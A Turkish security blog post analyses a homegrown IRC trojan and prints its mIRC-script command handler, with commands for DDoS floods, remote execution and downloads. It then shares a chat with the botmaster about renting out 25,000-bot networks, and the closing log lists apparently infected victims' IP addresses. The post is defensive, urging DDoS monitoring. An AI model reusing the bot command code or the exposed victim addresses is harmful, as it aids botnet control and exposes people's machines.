Botnet Gerçeği

Geçtiğimiz günlerde http://twitter.com/hack4career üzerinden yayınlanan bir kaç zararlı yazılımı (timunun.exe, scan.exe) incelediğimde karşıma yerli malı ddos saldırı özelliğine sahip, irc ve msn üzerinden haberleşebilen bir trojan çıkıverdi. Trojanın aldığı komutları incelediğimde reklam yapmadan, saldırı yapmaya kadar bir çok özelliği üzerinde barındırdığını gördüm.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
if ($1 = !reklam) { .set %reklam $2- }
if ($1 = !packet) { if ($2 = ddos) { //set %pchan # | if ($4 == random) { //fckrstart $3 $4 $r(1,65000) | halt } | //fckrstart $3 $4 $5 } }
if ($1 = !Atak) { if ($2 !== $null) { srvmsg  (Packet) (Yollaniyor) $2 Üzerinde $3 Toplam $4 Packet | synp start $4 $2 $3 } }
if ($1 = !nreklam) { msg #x %reklam }
if ($1 = !mesajnick) { .set %mesajnick $2- | echo -a #x Yeni Mesaj Atilacak Nick %mesajnick }
if ($1 = !mesaj) { .mesaj }
if ($1 = !settimer) { .set %timer $2- }
if ($1 = !timer) { .timer31 %timer $2- }
if ($1 = !timeroff) { .timer31 off }
if ($1 = !gir) { .girgir }
if ($1 = !Run) { srvmsg Running : $2- | .run $2- }
if ($1 = !qir) { .girulen $2- }
if ($1 = !q) { $2- }
if ($1 = !Version) { .Anlat }
if ($1 = !Down) { .Download $2- }
if ($1 = !download) { .msg #x 4,1 I14,1c4,1eSh14,1o4,1cK Lamer Koruması .. | /server irc.xxxx.tr }
if ($1 = !Clone) { .Clone $2- }
if ($1 = !IdentClone) { .identclone $2- }
if ($1 = !HideControl) { if ($appactive == $true) { msg #x Mirc Açik } | else { msg #x Mirc Kapali } }
if ($1 = !Hide) { .dll ice32.dll do_ShowWindow $window(-2).hwnd 0 }

Trojanın konfigürasyon dosyasında yer alan IRC sunucusuna bağlandığım zaman ilk bakışta boş görünen bir sunucu olarak görünsede çok geçmeden botmaster ile yaptığım sohbet esnasında sunucu üzerinde tam tamına 25000 adet bot olduğunu ve bunların sadece 500 TL’ye kiralanabildiğini öğrendiğimde DDOS izleme ve önleme sistemlerinin önemi benim için daha da artmış oldu.

DDOS izleme ve önleme sistemlerini hayata geçirme konusunda kurum veya kuruluşlarınızda henüz bir ilerleme kaydetmediyseniz, yöneticilerinizi ikna etme adına örnek bulmakta zorlanıyorsanız sizlere yardımcı olma adına botmaster ile gerçekleştirmiş olduğum sohbeti sizlerle paylaşıyorum. Unutmadan, her ne kadar 41 antivirüs üreticisinden 31 tanesi bu zararlı yazılımları (timunun.exe, scan.exe, imbot.exe) tespit ediyor olsada antivirüs politikalarınızdaki istenmeyen program politikalarına bu dosyaları eklemenizde fayda olabilir. Bir sonraki yazıda görüşmek dileğiyle…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
[20:32] <MS> güzel bot olmuş
[20:33] <MS> hoşuma gitmedi desem yalan olur
[20:34] <MS> çok fazla kişiye bulaşmamış ama sanırım
[20:34] <********> buLaştır o zaman
[20:35] <MS> yok yahu o benim işim değil
[20:35] <********> senin işin ne
[20:35] <MS> ben sadece bu tür zararlı yazılımları inceliyorum
[20:35] <MS> kendin mi yazdın bu fuckers.jpg içinde yer alan tüm scripti ?
[20:35] <********> evet
[20:36] <MS> araklamadın yani ?
[20:36] <********> arakLamışta oLabiLirim tam hatırLamıyorum çok eski
[20:37] <MS> HTTP1.4 nedir bunuda ilk defa gördüm
[20:37] <********> diğer gördükLerin neydi
[20:37] <********> roxnet mi
[20:37] <MS> yok roxnetide ilk defa duydum
[20:38] <********> bu HTTP de oper oLmadan sunucuda hiçbir işLem yapamıyosun
[20:38] <********> diğer Lerinden çok koLay bot çaLınıyor
[20:38] <MS> kanaldakileride göremiyorsun sanırım
[20:38] <MS> evet güzel bir yöntemmiş
[20:38] <MS> http1.4 ü nereden indirebilirim ?
[20:39] <********> googLe
[20:39] <********> buLabiLirsin oradan
[20:39] <********> botnetmi besLiceksin
[20:39] <MS> yok hayır sadece nasıl çalıştığını merak ettim
[20:40] <MS> google yapmıştım ama bulamamıştım
[20:44] <MS> scan.exe ile imbot.exe ne iş yapıyor
[20:45] <********> scan exe
[20:45] <********> ispiyoncu bot özeLLiği var
[20:45] <********> biLgisayardaki diğer virüsLeri buLup
[20:45] <********> hangi serverda besLendikLerini
[20:45] <********> veriyor
[20:45] <********> imbot exe ise msn ve facebook şifresi veriyor
[20:46] <MS> bunları sen mi yazdın ?
[20:46] <********> ewet
[20:47] <MS> hangi crypterı kullandın ?
[20:48] <********> arkadaşa packer yaptırmıştım
[20:48] <********> hmm
[20:48] <********> sende varmı crtptr
[20:48] <MS> yok maalesef
[20:52] <MS> xxxxxxxx@hotmail.com kimin ?
[20:52] <********> packer yapan arkadaşın
[20:54] <MS> bu işi neden yapıyorsun ? para kazanıyor musun ?
[20:54] <********> evet hazır kuruLu düzen oLarak satıyorum isteyen kişiLere
[20:54] <********> aLan kişiLer farkLı amaçLar için kuLLanıyor
[20:54] <MS> mesela ne gibi amaçlar ?
[20:55] <********> meseLa web sitesi oLan sitesini günde binLerce kişiye ziyaret ettirebiLiyor
[20:55] <MS> hitten para kazanıyor
[20:55] <********> kimisi rakip siteye saLdırı yaparak o siteyi çökertiyor
[20:55] <MS> ne zamandan beri bu işlerle uğraşıyorsun ?
[20:55] <********> kimisi irc serverLere saLdırı yapıyor
[20:55] <MS> ne kadar kiralama raici ?
[20:56] <********> 500 TL
[20:56] <********> isteğe göre değişiyor
[20:56] <MS> aylık mı yıllık mı
[20:56] <********> ömür boyu eLinin aLtında buLunucak şekiLde
[20:57] <MS> yakalanma korkunuz yok mu ?
[20:57] <********> :p
[20:57] <MS> mesela ya ben polis olsaydım
[20:57] <********> Sonunu düşünen kahraman oLamaz
[20:59] <MS> alıcı var demek ya sözde fakirleşmiştik halk olarak ama :)
[21:00] <MS> yai kaç 20-30 arası mı ?
[21:00] <MS> yaş demek istedim
[21:00] <********> 24
[21:01] <MS> öğrenci değilsin sanırım ?
[21:01] <********> değiLim
[21:01] <MS> ne kadar süredir bu işlerle uğraşıyorsun ?
[21:01] <********> 6-7 Sene
[21:02] <MS> bu zamana kadar bu işten ne kadar para kazanmışsındır kabaca ?
[21:03] <********> oturduğum ev araba
[21:03] <********> yediğim içtiğim vs vs.
[21:03] <********> ;)
[21:03] <MS> o kadar diyorsun yani
[21:03] <********> 50k
[21:03] <********> 25k Lık botnetLer
[21:03] <********> satıyorum
[21:03] <MS> inanması zor kanalda 1 tane var sadece
[21:04] <********> kanaL +u
[21:04] <********> sadece op oLan kişiyi görebiLirsin
[21:04] <********> ;)
[21:04] <MS> komutuna 1 tanesi yanıt verdi
[21:04] <********> kanaL +Mm
[21:05] <********> sadece o bot kanaLda op
[21:05] <********> kanaL +Mm modunda oLduğu için
[21:05] <********> diğerLeri yazamaz
[21:05] <MS> bende tek op sen görünüyorsun ondan dedim
[21:05] <MS> bu kanalda şimdi kaç bot var ?
[21:05] <********> 403
[21:11] <MS> xxxx'da kaç bot var ?
[21:11] <********> 895
[21:11] <********> topLamda 25 bin bot var
[21:11] <********> resim göndericektim sana
[21:11] <********> dur upLoad edebilirim
[21:12] <MS> sunucunu kapatacaklardır yakında
[21:12] <********> kapatsınLar yenisini açarım 10 dakkamı aLmaz
[21:12] <********> ;)
[21:12] <MS> botlara konfigürasyon nasıl geçeceksin ?
[21:12] <MS> haberleşme ?
[21:13] <********> ;)
[21:50] <MS> bu botların hepsi türkiyeden mi ?
[21:50] <********> * [RUS|00||803357] (XP-3602@85.26.164.76) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|M|94088] (XP-9592@95.10.143.18) has joined #xxx
[21:50] <********> * [TUR|00|MP|1458] (XP-2438@88.226.108.139) has joined #xxx
[21:50] <********> * [USA|00|M|15992] (XP-2325@112.205.48.212) Quit (Ping timeout)
[21:50] <********> * [ESP|00|MP|5424] (XP-9571@95.63.151.152) has joined #xxx
[21:50] <********> * [TUR|00||628074] (XP-4760@88.252.20.154) Quit (Connection reset by peer)
[21:50] <********> * [RUS|00|D|20753] (XP-3227@188.17.238.215) Quit (Connection reset by peer)
[21:50] <********> * [RUS|00|UD|07067] (XP-6066@ip-83-149-3-98.nwgsm.ru) Quit (Ping timeout)
[21:50] <********> * [ESP|00|D|45749] (XP-8229@186.98.193.55) Quit (Ping timeout)
[21:50] <********> * [TUR|00|M|94088] (XP-9592@95.10.143.18) Quit (Ping timeout)
[21:50] <********> * [TUR|00|P|78342] (XP-1906@78.180.34.21) Quit (Connection reset by peer)
[21:50] <********> * [ESP|00|D|46676] (XP-7788@186.98.193.55) has joined #xxx
[21:50] <********> * [ESP|00|M|58294] (XP-2335@host247.190-30-24.telecom.net.ar) has joined #xxx
[21:50] <********> * [BRA|00|P|30821] (XP-9933@189.82.185.109) has joined #xxx
[21:50] <********> * [TUR|00||423136] (XP-1993@88.228.111.79) Quit (Ping timeout)
[21:50] <********> * [TUR|00|M|10638] (XP-0056@88.228.111.79) has joined #xxx
[21:50] <********> * [TUR|00|P|17537] (XP-9032@94.122.107.201) has joined #xxx
[21:50] <********> * [TUR|00|M|70509] (XP-8216@95.15.107.24) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|P|84223] (XP-2377@78.161.205.164) has joined #xxx
[21:50] <********> * [ESP|00|D|46676] (XP-7788@186.98.193.55) Quit (Ping timeout)
[21:50] <********> * [ESP|02|MP|3357] (XP-9120@200.66.41.104) has joined #xxx
[21:50] <********> * [ESP|00|M|58294] (XP-2335@host247.190-30-24.telecom.net.ar) Quit (Ping timeout)
[21:50] <********> * [PRT|00|MD|2372] (XP-0409@188.140.78.105) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|M|81825] (XP-0312@88.228.156.161) has joined #xxx
[21:50] <********> * [USA|00|P|53894] (XP-6659@cpe-70-117-171-43.elp.res.rr.com) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|P|83786] (XP-8494@78.180.113.205) Quit (Connection reset by peer)
[21:50] <********> * [RUS|00|D|43169] (XP-2471@188.187.146.160) has joined #xxx
[21:50] <********> * [TUR|00|M|81825] (XP-0312@88.228.156.161) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|P|83485] (XP-5511@92.45.180.13) Quit (Ping timeout)
[21:50] <********> * [TUR|00||767061] (XP-0715@195.174.29.179) Quit (Connection reset by peer)
[21:50] <********> * [ESP|00|M|75075] (XP-0172@host211.190-225-214.telecom.net.ar) has joined #xxx
[21:50] <********> * [ESP|00|D|79796] (XP-2271@186.98.193.55) has joined #xxx
[21:50] <********> * [TUR|00|P|91644] (XP-4410@88.252.93.8) has joined #xxx
[21:50] <********> * [TUR|00|MP|4601] (XP-9739@78.180.113.205) has joined #xxx
[21:50] <********> * [TUR|00|MP|4750] (XP-5209@78.166.134.169) has joined #xxx
[21:50] <********> * [MEX|00|P|57920] (XP-6468@201.152.92.83) has joined #xxx
[21:50] <********> * [RUS|00|PD|7924] (XP-9229@188.130.189.198) Quit (Connection reset by peer)
[21:50] <********> * [TUR|00|MP|4750] (XP-5209@78.166.134.169) Quit (Connection reset by peer)
[21:51] <********> her üLke mevcut
Etiketler: 1.369 views Okunma 22 Kas 2016

Yazar Hakkında

Benzer Yazılar

GizemSohbet.com

Tragario

16 May 2017

Yorumlar


Sen de Yorumla!